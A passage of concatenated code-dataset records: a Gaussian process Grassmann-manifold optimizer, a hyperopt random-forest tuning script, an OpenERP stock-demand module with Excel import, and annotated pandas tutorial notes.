self._gradient_U_Grassmann(mode=1)\n # update the subspace through geodesic on Grassmann manifold \n U_temp = Grassmann_update(self.U, self.H, eta_i)\n self.U = U_temp\n # update the other kernel function\n self.kern, _ , _ = self.kernel_update(X=self.X, U=self.U, kernel=self.kern, messages= messages)\n\n self.negative_loglikelihood_update()\n \n return (self.hist_nll, self.hist_eta, self.hist_kern)\n\n\n\n def optimize_gradient_descent_Euclidean(self, max_iters=10, tol=1e-3, init_mode = \"fixed\", verbose=False):\n '''\n\n Optimization procedure using gradient descent on Eulidean space.\n\n\n '''\n self.max_iters = max_iters\n self.tol = tol\n self.hist_kern = list()\n self.hist_nll = np.zeros([max_iters])\n self.hist_eta = np.zeros([max_iters])\n \n messages = verbose\n \n eta = self.eta*np.ones([max_iters])\n self.hist_eta = eta\n for i, eta_i in enumerate(eta):\n self.hist_kern.append(self.kern)\n self.hist_nll[i] = self.negative_loglikelihood\n print(\"[step {0:3d}] neg-log-likelihood {1:9f} stepsize {2:5.3f}\".format(i, self.negative_loglikelihood, eta_i))\n # compute the grassmannian gradient\n #self._gradient_U_Grassmann(mode=1)\n self._gradient_U_Euclidean(mode=1)\n # update the matrix U via gradient descent \n U_temp = Euclidean_update(self.U, self.H, eta_i)\n self.U = U_temp\n # update the other kernel function\n self.kern, _ , _ = self.kernel_update(X=self.X, U=self.U, kernel=self.kern, messages= messages)\n self.negative_loglikelihood_update()\n \n return (self.hist_nll, self.hist_eta, self.hist_kern)\n\n\n def kernel_update(self, U, X, kernel, messages = True):\n '''\n\n Given U, X, return the self.kern from GPRegression \n\n '''\n nsample , ndim = X.shape \n nsample2 , ndim_latent = U.shape\n \n assert nsample == nsample2, \"The number of rows of X and U should match\"\n assert isinstance(kernel, GPy.kern.Kern), \"Use the GPy.kern.Kern type module\" \n assert kernel.input_dim == self.ndim_latent , \"The input dimension of U and kernel should match\" \n\n model = GPy.models.GPRegression(X= U, Y = X, kernel = kernel)\n \n model.optimize(max_iters = self.max_iters_kernel, messages=messages)\n kern = model.copy().kern\n \n Kernel_mat = kern.K(U, U) \n XX = gutil.linalg.tdot(X)\n\n KiX2 , _ = gutil.linalg.dpotrs(np.asfortranarray(Kernel_mat), np.asfortranarray(XX), lower=1)\n return (kern, XX, KiX2)\n\n\n def _gradient_K(self, mode=0):\n '''\n \n Learn the gradient of the negative log-likelihood of Gaussian Process with respect to the kernel matrix K. Require GPy package installed. 
\n \n Try: pip install GPy\n \n .. math::\n \n \\frac{dL}{dK} = 2*T - diag(diag(T)) \n \n T = (ndim*K^{-1} - K^{-1}*X*X'*K^{-1})\n :param mode: =0 in test mode, =1 in working mode\n :param Kernel: nsample x nsamples positive definite matrix with i,j elemen being K(Zi, Zj)\n :type Kernel: numpy.ndarray\n :param X: nsample x ndim data matrix of observations of Gaussian Process\n :type X: numpy.ndarray\n :param nsample: number of samples\n :type nsample: float\n :param ndim: dimension of observation data\n :type ndim: int\n \n '''\n Kernel = self.kern.K(self.U, self.U)\n S = self.XX\n try:\n KiX2 = self.KiX2\n except AttributeError:\n print(\"No KiX2 stored. Recompute\")\n KiX2 , _ = gutil.linalg.dpotrs(np.asfortranarray(Kernel), np.asfortranarray(S), lower=1)\n else:\n if(mode == 1):\n KiX2 , _ = gutil.linalg.dpotrs(np.asfortranarray(Kernel), np.asfortranarray(S), lower=1)\n # KiS = K^{-1}*X*X'\n \n KiXXiK , _ = gutil.linalg.dpotrs(np.asfortranarray(Kernel), np.asfortranarray(KiX2.T), lower=1)\n # KiXXiK: K^{-1}*X*X'*K^{-1}\n \n Ki , _ = gutil.linalg.dpotri(np.asfortranarray(Kernel), lower=1)\n dL_dK_0 = 0.5*(self.ndim*Ki - KiXXiK)\n self.dL_dK = 2*dL_dK_0 - np.diag(np.diag(dL_dK_0)) \n \n return self.dL_dK \n \n \n\n \n def _rbf_kernel_gradient_U(self, mode=0):\n '''\n \n Compute the gradient of RBF kernel matrix with respect to the input matrix U.\n \n .. math::\n \n \\frac{dK}{dU} = -\\frac{variance}{lengthscale^2}\\exp( -\\frac{1}{2*lengthscale^2} \\| U_{m} - U_{n} \\|^2 )*2[U_{m,,l}- U_{,m,l}]\n \n :param mode: =0 in test mode, =1 in working mode\n :param U: nsample x ndim_latent matrix. Each row corresponds to a latent input of Gaussian Process sample function.\n :type U: numpy.ndarray\n :param lengthscale: corresponds to $K(r) = variance* \\exp(-\\frac{1}{2*lengthscale^2}r^2)$ \n :type lengthscale: float\n :param variance: see above\n :type variance: float\n '''\n \n self.lengthscale = self.kern.lengthscale.values\n self.variance = self.kern.variance.values \n \n U_scaled = self.U / self.lengthscale\n Usquare = np.sum(np.square(U_scaled), 1)\n K_dist2 = -2.*gutil.linalg.tdot(U_scaled) + (Usquare[:, None] + Usquare[None, :])\n \n K_dvar = np.exp(-0.5 * K_dist2) # exp(-0.5*||zm - zn||^2 )\n \n lengthscale2 = np.square(self.lengthscale) \n K_dist = 2*(self.U[:, None, :] - self.U[None, :, :])\n self.dK_dZ = (-self.variance / lengthscale2) * np.transpose(K_dvar[:, :, np.newaxis] * K_dist, (1, 0, 2))\n \n return self.dK_dZ\n \n \n def _gradient_U(self, mode=0):\n '''\n\n return dL/dU, the gradient of log-likelihood with respect to input variables Z via chain rule\n \n '''\n # pre-compute the gradient dL/dK and dK/dU \n try:\n self.dL_dK\n except AttributeError:\n print(\"The gradient of L w.r.t K not been computed. Just compute it anyway.\")\n self._gradient_K() \n else:\n if(mode == 1):\n self._gradient_K(mode)\n \n try:\n self.dK_dZ\n except AttributeError:\n print(\"The gradient of K w.r.t. U not been computed. Just compute it anyway\")\n if self.kern.name == 'rbf':\n self._rbf_kernel_gradient_U()\n else:\n if(mode == 1):\n if self.kern.name == 'rbf':\n self._rbf_kernel_gradient_U(mode)\n\n self.dL_dU = np.sum(self.dK_dZ * self.dL_dK.T[:, :, None], 0)\n return self.dL_dU\n\n\n def _gradient_U_Grassmann(self, mode=0):\n '''\n\n Compute DL/dU, the natural gradient of Likelihood w.r.t. U on the Grassmann manifold\n \n .. 
math::\n \\mathbf{G} = (\\mathbf{I}- \\mathbf{UU}^{T})*\\frac{dL}{dU}\n\n '''\n # pre-compute the Euclidean gradient dL/dU\n try: \n self.dL_dU\n except AttributeError:\n print(\"The gradient of L w.r.t. U not been computed. Just compute it anyway.\")\n self._gradient_U()\n else:\n if (mode == 1):\n self._gradient_U(mode)\n \n #projection on orthogonal direction\n U_orth = np.eye(self.nsample) - gutil.linalg.tdot(self.U)\n self.G = np.dot(U_orth, self.dL_dU)\n self.H = -self.G\n return (self.G, self.H)\n \n \n def _gradient_U_Euclidean(self, mode=0):\n '''\n\n Compute dL/dU, the plain Euclidean gradient of the likelihood w.r.t. U (no projection onto the Grassmann tangent space)\n \n .. math::\n \\mathbf{G} = \\frac{dL}{dU}\n\n '''\n # pre-compute the Euclidean gradient dL/dU\n try: \n self.dL_dU\n except AttributeError:\n print(\"The gradient of L w.r.t. U not been computed. Just compute it anyway.\")\n self._gradient_U()\n else:\n if (mode == 1):\n self._gradient_U(mode)\n \n #no projection here: U_orth stays the identity, so this is the raw Euclidean gradient\n U_orth = np.eye(self.nsample) #- gutil.linalg.tdot(self.U)\n self.G = np.dot(U_orth, self.dL_dU)\n self.H = -self.G\n return (self.G, self.H)\n\n\n\n \n def negative_loglikelihood_update(self):\n ''' \n\n Compute the negative log-likelihood of Gaussian distribution\n \n .. math::\n negative-loglikelihood = \\\frac{p*N}{2}\\\log(2\\\pi) + \\\frac{p}{2}\\\log\\\det(K) + \\\frac{1}{2}\\\text{tr}(K^{-1}X*X^{T})\n \n '''\n K = self.compute_kernel_mat()\n sign , K_logdet = np.linalg.slogdet(K)\n try:\n KiX2 = self.KiX2\n except AttributeError:\n print(\"No KiX2 stored. Recompute\") \n KiX2 , _ = gutil.linalg.dpotrs(np.asfortranarray(K), np.asfortranarray(self.XX), lower=1)\n \n \n KiX2_trace = np.trace(KiX2)\n \n self.negative_loglikelihood = (self.ndim*self.nsample) / 2 * np.log(2*np.pi) \\\n + self.ndim / 2 * K_logdet + 1/2* KiX2_trace\n\n\n\n def compute_kernel_mat(self):\n return self.kern.K(self.U, self.U) \n \n \n def get_G(self):\n try: \n self.G\n except AttributeError:\n print(\"The tangent direction of L w.r.t. U not been computed. Just compute it anyway.\")\n self._gradient_U_Grassmann()\n return self.G\n\n \n def get_H(self):\n try: \n self.H\n except AttributeError:\n print(\"The negative tangent direction of L w.r.t. U not been computed. Just compute it anyway.\")\n self._gradient_U_Grassmann()\n return self.H\n\n \n def get_X(self):\n return self.X\n\n def get_U(self):\n return self.U\n \n# def __str__(self):\n# self.print_param()\n# self.print_solver()\n \n def print_param(self):\n print(\"Parameter Information: \")\n print(\"total samples: \" + str(self.nsample))\n print(\"observation dimension: \" + str(self.ndim))\n print(\"latent variable dimension: \" + str(self.ndim_latent))\n print(self.kern)\n\n def print_solver(self):\n print(\"Solver settings: \")\n print(\"stepsize eta: \" + str(self.eta))\n print(\"total iterations: \" + str(self.max_iters))\n print(\"tolerance threshold: \" + str(self.tol))\n \n \n def get_optimize_trajectory(self):\n return (self.hist_nll, self.hist_eta, self.hist_kern)\n\n\n\n def restart(self):\n\n print(\"Solver restart ...\")\n self.U = self._init_U\n self.X = self._init_X\n\n _ , self.ndim_latent = self.U.shape \n\n self.nsample, self.ndim = self.X.shape\n \n self.XX = gutil.linalg.tdot(self.X)\n\n self.kern = self._kern\n \n self.negative_loglikelihood_update()\n max_iters = self._max_iters \n self.hist_kern = list()\n self.hist_nll = np.zeros([max_iters])\n self.hist_eta = np.zeros([max_iters])\n try:\n self.G\n except AttributeError:\n print(\"No G.\")\n else:\n self.G = np.zeros(self.G.shape) \n\n try:\n self.H\n except AttributeError:\n print(\"No H.\")\n else:\n self.H = np.zeros(self.H.shape) \n\n\n try:\n self.KiX2\n except AttributeError:\n print(\"No KiX2.\")\n else:\n del self.KiX2\n\n\n\n\n'''\n-----------------------------------------------------------------------------------------\n\n Auxiliary functions \n\n-----------------------------------------------------------------------------------------\n'''\n \ndef Grassmann_update(U, H, eta):\n '''\n \n Compute the update of U in direction of H along the geodesic of the Grassmann manifold\n .. math::\n U' = U*V*\\\cos(\\\eta*\\\Sigma)*V^{T} + W*\\\sin(\\\eta*\\\Sigma)*V^{T}\n \n :param U: the initial point of U on Grassmann manifold\n :type U: numpy.ndarray\n :param H: the tangent direction of curve on the manifold\n :type H: numpy.ndarray\n :param eta: the stepsize \n :type eta: float\n\n '''\n # compute the svd of tangent vector H \n U_sig, sig, Vh_sig = sp.linalg.svd(H, full_matrices=False)\n ndim_latent, _ = Vh_sig.shape\n # compute the two orthogonal channels\n Sig_cos = sp.linalg.diagsvd(np.cos(eta*sig), ndim_latent, ndim_latent)\n Sig_sin = sp.linalg.diagsvd(np.sin(eta*sig), ndim_latent, ndim_latent) \n # compute the geodesic on Grassmann manifold\n U_new = gutil.linalg.mdot(U, (Vh_sig.T, Sig_cos, Vh_sig)) + gutil.linalg.mdot(U_sig, Sig_sin, Vh_sig)\n assert (np.allclose(np.dot(U_new.T, U_new), np.eye(ndim_latent))), \"Output not orthogonal\"\n return U_new\n\n\ndef Euclidean_update(U, H, eta):\n '''\n\n Compute the update of U in the direction of H in Euclidean space via conventional gradient descent\n\n .. 
math::\n U' = U + eta*H\n \n :param U: the initial point of U on Grassmann manifold\n :type U: numpy.ndarray\n :param H: the tangent direction of curve on the manifold\n :type H: numpy.ndarray\n :param eta: the stepsize \n :type eta: float\n\n '''\n U_new = U + eta*H\n return U_new ","sub_path":"src/G2PnetSolver_v1.py","file_name":"G2PnetSolver_v1.py","file_ext":"py","file_size_in_byte":16830,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"157942631","text":"import pandas as pd \nimport numpy as np \n\nfrom sklearn import ensemble\nfrom sklearn import model_selection\nfrom sklearn import metrics\n\nfrom functools import partial\nfrom skopt import space\nfrom skopt import gp_minimize\n\nfrom hyperopt import tpe, hp, fmin, Trials\nfrom hyperopt.pyll.base import scope\n\ndef optimize(params,x,y):\n ## Here params itself is a dict.\n model = ensemble.RandomForestClassifier(**params)\n kf = model_selection.StratifiedKFold(n_splits=5)\n accuracies =[]\n for idx in kf.split(X=x,y=y):\n train_idx,test_idx = idx[0],idx[1]\n xtrain = x[train_idx]\n ytrain = y[train_idx]\n\n xtest = x[test_idx]\n ytest = y[test_idx]\n\n model.fit(xtrain,ytrain)\n\n pred = model.predict(xtest)\n\n fold_acc = metrics.accuracy_score(ytest,pred)\n\n accuracies.append(fold_acc)\n return -1.0 * np.mean(accuracies)\n\nif __name__ ==\"__main__\":\n df = pd.read_csv('../input/mobile-train.csv')\n X= df.drop(\"price_range\",axis=1).values \n y = df.price_range.values \n\n param_space = {\n 'max_depth':scope.int(hp.quniform('max_depth',3,15,1)),\n 'n_estimators':scope.int(hp.quniform('n_estimators',100,600,1)),\n 'criterion':hp.choice('criterion',['gini','entropy']),\n 'max_features':hp.uniform('max_features',0.01,1), \n\n }\n# quniform draws integer-valued steps, choice picks one option from a list, uniform draws a float\n optimization_function = partial(optimize,x=X,y=y)\n trials =Trials()\n result = fmin(\n fn=optimization_function,\n space = param_space,\n algo = tpe.suggest,\n max_evals = 15,\n trials=trials,\n )\n\n #print(dict(zip(param_names,x.result)))\n\n print(result)","sub_path":"model validation/src/hyperopt_optimize.py","file_name":"hyperopt_optimize.py","file_ext":"py","file_size_in_byte":1704,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
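One caveat about the hyperopt script above: for hp.choice parameters, fmin reports the index of the winning option (criterion comes back as 0 or 1, not 'gini' or 'entropy'). A short sketch, reusing the script's param_space, result, X and y names, of decoding the result with hyperopt's space_eval before refitting:

from hyperopt import space_eval

# map the raw fmin result (choice indices, quniform floats) back to
# actual parameter values; scope.int(...) already casts the integer ones
best_params = space_eval(param_space, result)
print(best_params)   # e.g. {'criterion': 'gini', 'max_depth': 7, ...}

# refit on the full data with the decoded parameters
model = ensemble.RandomForestClassifier(**best_params)
model.fit(X, y)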
+{"seq_id":"646023606","text":"# -*- coding: utf-8 -*-\n###########################################################################################\n#\n# module name for OpenERP\n# Copyright (C) 2015 qdodoo Technology CO.,LTD. ().\n#\n###########################################################################################\n\nfrom openerp import models, fields, api\nfrom openerp.osv import osv\nimport xlrd\nimport base64\nfrom openerp.tools.translate import _\nfrom datetime import timedelta, datetime\nimport logging\nfrom openerp import SUPERUSER_ID\nimport sys\n\nreload(sys)\nsys.setdefaultencoding('utf8')\n\n_logger = logging.getLogger(__name__)\n\nPROCUREMENT_PRIORITIES = [('0', u'不紧急'), ('1', u'一般'), ('2', u'紧急的'), ('3', u'非常紧急')]\n\n\nclass qdodoo_stock_demand(models.Model):\n \"\"\"\n Conversion order model\n \"\"\"\n _name = 'qdodoo.stock.demand' # model name\n _description = 'tet.Template.line' # model description\n\n name = fields.Char(u'转换单', copy=False)\n partner_id = fields.Many2one('res.partner', string=u'客户')\n create_datetime = fields.Datetime(string=u'创建日期', copy=False)\n date_planed = fields.Datetime(string=u'计划日期', required=True, copy=False)\n location_id = fields.Many2one('stock.warehouse', string=u'仓库', required=True)\n location_id2 = fields.Many2one('stock.location', string=u'需求库位')\n rule_id = fields.Many2one('procurement.rule', 'Rule', track_visibility='onchange')\n origin = fields.Char(u'源单据')\n bom_id = fields.Many2one('mrp.bom', u'物料清单')\n purchase_id = fields.Many2one('purchase.order', u'采购订单')\n priority_new = fields.Selection(PROCUREMENT_PRIORITIES, u'优先级', required=True, select=True, )\n route_ids = fields.Many2many('stock.location.route', 'stock_location_route_demand', 'procurement_id',\n 'route_id',\n 'Preferred Routes', readonly=True)\n route_id = fields.Many2one('stock.location.route', string=u'路线', copy=False, required=True)\n group_id = fields.Many2one('procurement.group', string=u'采购组', required=True)\n company_id = fields.Many2one('res.company', string=u'公司', copy=False)\n state = fields.Selection([('draft', u'草稿'),\n ('done', u'完成'),\n ], u'状态', copy=False)\n qdodoo_stock_product_ids = fields.One2many('qdodoo.stock.product', 'qdodoo_stock_demand_id', u'产品明细')\n import_file = fields.Binary(string=\"导入的Excel文件\")\n demand_id = fields.Many2one('qdodoo.stock.demand', string=u'源需求转换单', copy=False)\n\n _defaults = {\n 'create_datetime': datetime.now(),\n 'date_planed': datetime.now(),\n 'state': 'draft',\n 'priority_new': '1',\n 'name': lambda obj, cr, uid, context: '/',\n 'company_id': lambda self, cr, uid, c: self.pool.get('res.company')._company_default_get(cr, uid,\n 'qdodoo.stock.demand',\n context=c),\n }\n\n def btn_import_data(self, cr, uid, ids, context=None):\n wiz = self.browse(cr, uid, ids[0])\n if wiz.import_file:\n try:\n excel = xlrd.open_workbook(file_contents=base64.decodestring(wiz.import_file))\n except:\n raise osv.except_osv(_(u'提示'), _(u'请使用xls文件进行上传'))\n product_info = excel.sheet_by_index(0)\n product_obj = self.pool.get('product.product')\n company_obj = self.pool.get('res.company')\n qdodoo_obj = self.pool.get('qdodoo.stock.product')\n lst = []\n for obj in range(1, product_info.nrows):\n val = {}\n # read the product code\n default_code = product_info.cell(obj, 0).value\n if not default_code:\n raise osv.except_osv(_(u'提示'), _(u'第%s行,产品编号不能为空') % obj)\n # read the product quantity\n product_qty = product_info.cell(obj, 3).value\n if not product_qty:\n raise osv.except_osv(_(u'提示'), _(u'第%s行,产品数量不能为空') % obj)\n # look up the company id\n company_name = product_info.cell(obj, 2).value\n if not company_name:\n raise osv.except_osv(_(u'提示'), _(u'第%s行,公司不能为空') % obj)\n company = company_obj.search(cr, uid, [('name', '=', company_name)])\n # find the matching product id in the system\n product_id = product_obj.search(cr, uid,\n [('default_code', '=', default_code), 
('company_id', '=', company)])\n if not product_id:\n raise osv.except_osv(_(u'提示'), _(u'本公司没有编号为%s的产品') % default_code)\n else:\n product = product_obj.browse(cr, uid, product_id[0])\n val['product_id'] = product.id\n val['name'] = product.name\n val['uom_id'] = product.uom_id.id\n val['qdodoo_stock_demand_id'] = wiz.id\n val['product_qty'] = product_qty\n lst.append(val)\n for res in lst:\n qdodoo_obj.create(cr, uid, res)\n self.write(cr, uid, wiz.id, {'import_file': ''})\n else:\n raise osv.except_osv(_(u'提示'), _(u'请先上传模板'))\n\n def change_location_id(self, cr, uid, ids, location_id, context=None):\n if location_id:\n warehouse = self.pool.get('stock.warehouse').browse(cr, uid, location_id, context=context)\n return {'value': {'location_id2': warehouse.lot_stock_id.id}}\n return {}\n\n def create(self, cr, uid, vals, context=None):\n # if vals.get('name', '/') == '/':\n vals['name'] = self.pool.get('ir.sequence').get(cr, uid, 'qdodoo.stock.demand') or '/'\n context = dict(context or {}, mail_create_nolog=True)\n order = super(qdodoo_stock_demand, self).create(cr, uid, vals, context=context)\n return order\n\n def btn_action_conversion(self, cr, uid, ids, context=None):\n if context == None:\n context = {}\n praper_obj = self.pool.get('procurement.order')\n inv_obj = self.browse(cr, uid, ids[0], context=context)\n line_new = self.browse(cr, uid, ids[0], context=context)\n return_list = []\n for line in line_new.qdodoo_stock_product_ids:\n values = {\n 'stock_demand_number': inv_obj.name,\n 'partner_dest_id': inv_obj.partner_id.id,\n 'warehouse_id': inv_obj.location_id.id,\n 'location_id': inv_obj.location_id2.id,\n 'date_planned': inv_obj.date_planed,\n 'group_id': inv_obj.group_id.id,\n 'origin': inv_obj.origin,\n 'priority_new': '1',\n 'state': 'confirmed',\n 'purchase_id': inv_obj.purchase_id.id,\n 'rule_id': inv_obj.rule_id.id,\n 'bom_id': inv_obj.bom_id.id,\n 'name': line.product_id.name,\n 'product_id': line.product_id.id,\n 'product_qty': line.product_qty,\n 'product_uom': line.uom_id.id,\n 'qdodoo_stock_demand_id': ids[0],\n 'company_id': line_new.company_id.id,\n 'order_id_new': line_new.id,\n }\n res = praper_obj.create(cr, uid, values, context=context)\n return_list.append(res)\n list_ids = [res]\n if inv_obj.route_id:\n sql = \"\"\"insert INTO stock_location_route_procurement (procurement_id, route_id) VALUES (%s,%s)\"\"\" % (\n res, inv_obj.route_id.id)\n cr.execute(sql)\n self.pool.get('procurement.order').run(cr, uid, list_ids, context=context)\n inv_obj.write({'state': 'done'})\n\n\nclass qdodoo_stock_product(models.Model):\n _name = 'qdodoo.stock.product'\n\n product_id = fields.Many2one('product.product', string=u'产品', required=True)\n product_qty = fields.Float(string=u'数量', required=True)\n name = fields.Char(u'备注')\n uom_id = fields.Many2one('product.uom', string=u'单位', required=True)\n qdodoo_stock_demand_id = fields.Many2one('qdodoo.stock.demand', string=u'需求单')\n\n def onchange_product_id(self, cr, uid, ids, product_id, context=None):\n res = {}\n res['value'] = {}\n if product_id:\n product_obj = self.pool.get('product.product').browse(cr, uid, product_id, context=context)\n res['value']['name'] = product_obj.product_tmpl_id.name\n res['value']['uom_id'] = product_obj.uom_id.id,\n return res\n else:\n return {}\n","sub_path":"qdodoo_stock_demand/qdodoo_stock_demand.py","file_name":"qdodoo_stock_demand.py","file_ext":"py","file_size_in_byte":9014,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} 
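The btn_import_data method in the record above relies on a pattern that is easy to miss: an OpenERP Binary field stores its payload base64-encoded, so the bytes must be decoded before xlrd can open them. A standalone sketch of that round trip, using the same Python 2 era APIs as the module; the products.xls file name is hypothetical:

import base64
import xlrd

with open('products.xls', 'rb') as fh:
    import_file = base64.encodestring(fh.read())   # what the Binary field holds

# decode back to raw bytes before handing them to xlrd
book = xlrd.open_workbook(file_contents=base64.decodestring(import_file))
sheet = book.sheet_by_index(0)
for row in range(1, sheet.nrows):                  # row 0 is the header row
    default_code = sheet.cell(row, 0).value        # product code column
    product_qty = sheet.cell(row, 3).value         # quantity column
    print(default_code, product_qty)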
+{"seq_id":"550388886","text":"# Data Analysis with Python (Chapter 5)\r\n# Getting Started with Pandas\r\n\r\nfrom pandas import Series, DataFrame\r\nimport pandas as pd\r\nimport numpy as np\r\n\r\nimport pandas_datareader.data as web\r\nfrom pandas import MultiIndex\r\n\r\n##########################################\r\n# Introduction to pandas Data Structures\r\n##########################################\r\n\r\n###########\r\n# Series\r\n###########\r\nobj = Series([4, 7, -5, 3])\r\nobj.index\r\nobj.values\r\n# 创建Series时自定义index\r\nobj2 = Series([4, 7, -5, 3], index=['d', 'b', 'a', 'c'])\r\nobj2.index\r\n\r\nobj2['a'] # 通过index来获取对应的value\r\nobj2['d'] = 6 # 重新设定index 'd'的value\r\n\r\n# 对Series做一下操作仍会保留对应index\r\nobj2[obj2 > 0]\r\nobj2 * 2\r\nnp.exp(obj2)\r\n# 把Series想成一个fixed-length, ordered dict, as it is a mappingof index values to data values.\r\n'b' in obj2 # True\r\n'e' in obj2 # False\r\n\r\n# 通过python dict来生成Series\r\n# When only passing a dict, the index in the resulting Series will have the dict’s keys in sorted order.\r\nsdata = {'Ohio': 35000, 'Texas': 71000, 'Oregon': 16000, 'Utah': 5000}\r\nobj3 = Series(sdata)\r\n# sdata dict中没有'California',obj4中 以'California'为index对应的value为NaN\r\nstates = ['California', 'Ohio', 'Oregon', 'Texas']\r\nobj4 = Series(sdata, index=states)\r\n\r\n# The isnull and notnull functions in pandas should be used to detect missing data:\r\n# 返回对应的 以True/False masked Series\r\npd.isnull(obj4) \r\npd.notnull(obj4)\r\n\r\n# A critical Series feature for many applications is that it automatically aligns differently \r\n# indexed data in arithmetic operations:\r\nobj3 +obj4 # 两个Series中index对应相同的value相加; Series中独特的index保留其value,列出于结果中\r\n\r\n# A Series’s index can be altered in place by assignment:\r\nobj.index = ['Bob', 'Steve', 'Jeff', 'Ryan']\r\n\r\n\r\n###########\r\n# Data Frame\r\n###########\r\ndata = {'state': ['Ohio', 'Ohio', 'Ohio', 'Nevada', 'Nevada'],\r\n'year': [2000, 2001, 2002, 2001, 2002],\r\n'pop': [1.5, 1.7, 3.6, 2.4, 2.9]}\r\nframe = DataFrame(data) # 通过dict来生成df\r\n\r\nDataFrame(data, columns=['year', 'state', 'pop']) # 若data中有更多的key:value pairs,可以指定用其中的一部分\r\n\r\n# if you pass a column that isn’t contained in data, it will appear with NA values in the result:\r\nframe2 = DataFrame(data, columns=['year', 'state', 'pop', 'debt'],\r\n index=['one', 'two', 'three', 'four', 'five'])\r\nframe2.columns # 显示DataFrame中的列名\r\n\r\n# 从DataFrame中取出其中一列(2种方法等价):\r\nframe2['state'] # by dict-like notation\r\nframe2.year # by attribute\r\n\r\n# Rows can also be retrieved by position or name by a couple of methods, such as the ix indexing field:\r\nframe2.ix['three'] # 取出index为'three'的row; index=['one', 'two', 'three', 'four', 'five']\r\n\r\n# Columns can be modified by assignment. \r\nframe2['debt'] = 16.5 # 将'debt'这一列全部设为16.5\r\nframe2['debt'] = np.arange(5.) # np.arange返回 0, 1, 2, 3, 4\r\n # np.arange: return evenly spaced values within a given interval\r\n# 将单独的一个Series加入DataFrame中\r\n# When assigning lists or arrays to a column, the value’s length must match the length of the DataFrame.\r\n# If you assign a Series, it will be instead conformed exactly to the DataFrame’s index, \r\n# inserting missing values in any holes.\r\nval = Series([-1.2, -1.5, -1.7], index=['two', 'four', 'five'])\r\nframe2['debt'] = val # 使用val Series对frame2中的'debt'列赋值; \r\n # index须一一对应,没有对应的插入missing value (NaN)\r\n# Assigning a column that doesn’t exist will create a new column. 
\r\n# The del keyword will delete columns as with a dict:\r\nframe2['eastern'] = frame2.state == 'Ohio' # 在df中创建新一列'eastern':该列的值为True/False(根据frame2.state == 'Ohio')\r\ndel frame2['eastern'] # 删除df中的'eastern'列\r\nframe2.columns\r\n\r\n# 通过nested dict来创建Data Frame\r\npop = {'Nevada': {2001: 2.4, 2002: 2.9},\r\n 'Ohio': {2000: 1.5, 2001: 1.7, 2002: 3.6}}\r\nframe3 = DataFrame(pop)\r\n\r\n# 设置df的index name和column name\r\nframe3.index.name = 'year'; frame3.columns.name = 'state' \r\nframe3.T # df转置\r\n\r\n\r\n###########\r\n# Index Objects\r\n###########\r\n\r\n# pandas’s Index objects are responsible for holding the axis labels and other metadata (like the axis name or names). \r\n# Any array or other sequence of labels used when constructing a Series or DataFrame is internally converted to an Index.\r\n\r\nobj = Series(range(3), index=['a', 'b', 'c'])\r\nindex = obj.index\r\nindex[1:] # 对Series的index obj做index\r\n# Index objects are immutable and thus can’t be modified by the user. (只能生成Series/DataFrame时assign index)\r\n# index[1] = 'd' 会报错\r\n'Ohio' in frame3.columns # True\r\n2003 in frame3.index # False\r\n\r\n\r\n###############################\r\n# Essential Functionality\r\n###############################\r\n\r\n#############\r\n# Reindexing\r\n#############\r\n# Create a new object with the data conformed to a new index.\r\nobj = Series([4.5, 7.2, -5.3, 3.6], index=['d', 'b', 'a', 'c'])\r\n# reindex with the original data\r\nobj2 = obj.reindex(['a', 'b', 'c', 'd', 'e']) # index为'e'时,value为NaN\r\nobj.reindex(['a', 'b', 'c', 'd', 'e'], fill_value=0) # 将缺失值处理为 0\r\n\r\n# The method option allows us to do this, using a method such as ffill which forward fills the values:\r\nobj3 = Series(['blue', 'purple', 'yellow'], index=[0, 2, 4])\r\nobj3.reindex(range(6), method='ffill') # 前向值填充(填充的值与该index的前一个值相同)\r\n# reindex methods:\r\n# 'ffill' or 'pad': Fill (or carry) values forward\r\n# 'bfill' or 'backfill': Fill (or carry) values backward\r\n\r\n# With DataFrame, reindex can alter either the (row) index, columns, or both.\r\nframe = DataFrame(np.arange(9).reshape((3, 3)), index=['a', 'c', 'd'],\r\n columns=['Ohio', 'Texas', 'California'])\r\nframe2 = frame.reindex(['a', 'b', 'c', 'd']) # 新增row index 'b',新增行的值全为NaN\r\n\r\n# The columns can be reindexed using the columns keyword:\r\nstates = ['Texas', 'Utah', 'California']\r\nframe.reindex(columns=states) # reindex之后'Utah'列的值全为NaN\r\n# Both can be reindexed in one shot, though interpolation will only apply row-wise (axis 0):\r\nframe.reindex(index=['a', 'b', 'c', 'd'], method='ffill', columns=states)\r\nframe.ix[['a', 'b', 'c', 'd'], states] # 等价于上一行 没有设置method参数\r\n\r\n\r\n###########\r\n# Dropping entries from an axis\r\n###########\r\n# the drop method will return a new object with the indicated value or values deleted from an axis:\r\nobj = Series(np.arange(5.), index=['a', 'b', 'c', 'd', 'e'])\r\nnew_obj = obj.drop('c')\r\n\r\ndata = DataFrame(np.arange(16).reshape((4, 4)),\r\n index=['Ohio', 'Colorado', 'Utah', 'New York'],\r\n columns=['one', 'two', 'three', 'four'])\r\ndata.drop(['Colorado', 'Ohio']) # 默认axis=0(row): index\r\ndata.drop('two', axis=1) # axis=1: column\r\ndata.drop(['two', 'four'], axis=1)\r\n\r\n\r\n###########\r\n# Indexing, selection, and filtering\r\n###########\r\nobj = Series(np.arange(4.), index=['a', 'b', 'c', 'd'])\r\nobj['b'] # 等价于obj[1]\r\nobj[1] # index position number offset从0开始\r\n\r\nobj[['b', 'a', 'd']] # 通过label\r\nobj[2:4] # 通过index position number\r\n\r\nobj[[1, 3]] # 通过index position 
